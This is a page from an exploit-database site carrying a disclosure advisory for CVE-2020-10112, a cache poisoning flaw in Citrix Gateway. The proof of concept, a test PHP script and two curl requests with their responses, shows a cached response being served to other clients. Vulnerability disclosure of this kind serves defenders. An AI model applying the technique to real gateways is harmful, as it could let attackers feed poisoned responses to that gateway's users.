0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Citrix Gateway 11.1 / 12.0 / 12.1 Cache Poisoning Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Product: Citrix Gateway
Manufacturer: Citrix Systems, Inc.
Affected Version(s): 11.1, 12.0, 12.1
Tested Version(s): 11.1.63.15, 12.0.63.13, 12.1.55.18
Vulnerability Type: Cache Poisoning (CAPEC-141)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2020-01-31
Solution Date: no solution
Public Disclosure: 2020-03-05
CVE Reference: CVE-2020-10112
Author of Advisory: Micha Borrmann (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
"Citrix Gateway is a customer-managed solution that can be deployed on
premises or on any public cloud, such as AWS, Azure, or Google Cloud
Platform. Citrix Gateway provides users with secure access and single
sign-on to all the virtual, SaaS and web applications they need to be
productive." (see [1])
The solution contains a caching system, which stores dynamic content
for a static period of time. During the caching time, even requests
with individual parameters are answered with the cached value. This
can be abused for cache poisoning.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
If a client is asking for an URL with parameter "value=A", the
parameter will be processed and the response will be cached. If
another client is requesting the same URL but with a different
parameter "value=B", the request will be answered with the initial
response ("value=A") during the caching time (for 112 seconds).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Provide on a Citrix Gateway system ($NSGATEWAYHOST) the following PHP
script at /var/netscaler/logon/increment.php.
<?php
print(++$_POST[value]);
print("\n");
?>
The first response will be processed correctly, meaning that the
provided value in the HTTP response will be incremented by one.
$ curl --include --url https://$NSGATEWAYHOST/logon/incremental.php --data "value=41"
HTTP/1.1 200 OK
Age: 1
Date: Fri, 31 Jan 2020 12:13:11 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, must-revalidate
Connection: Keep-Alive
Via: NS-CACHE-10.0: 121
ETag: "KXGGENKFDKPU"
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Length: 3
Content-Type: text/html; charset=UTF-8
42
A later request will be answered with the same value, even with
another browser from another source IP address:
$ curl --include --url https://$NSGATEWAYHOST/logon/incremental.php --data "value=77" --user-agent "Mozilla"
HTTP/1.1 200 OK
Age: 71
Date: Fri, 31 Jan 2020 12:13:11 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store,must-revalidate
Connection: Keep-Alive
Via: NS-CACHE-10.0: 121
ETag: "KXGGENKFDKPU"
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Length: 3
Content-Type: text/html; charset=UTF-8
42
If the age of the response reaches 112, the cache will be cleared and
then the correct value will be used.
# 0day.today [2024-11-15] #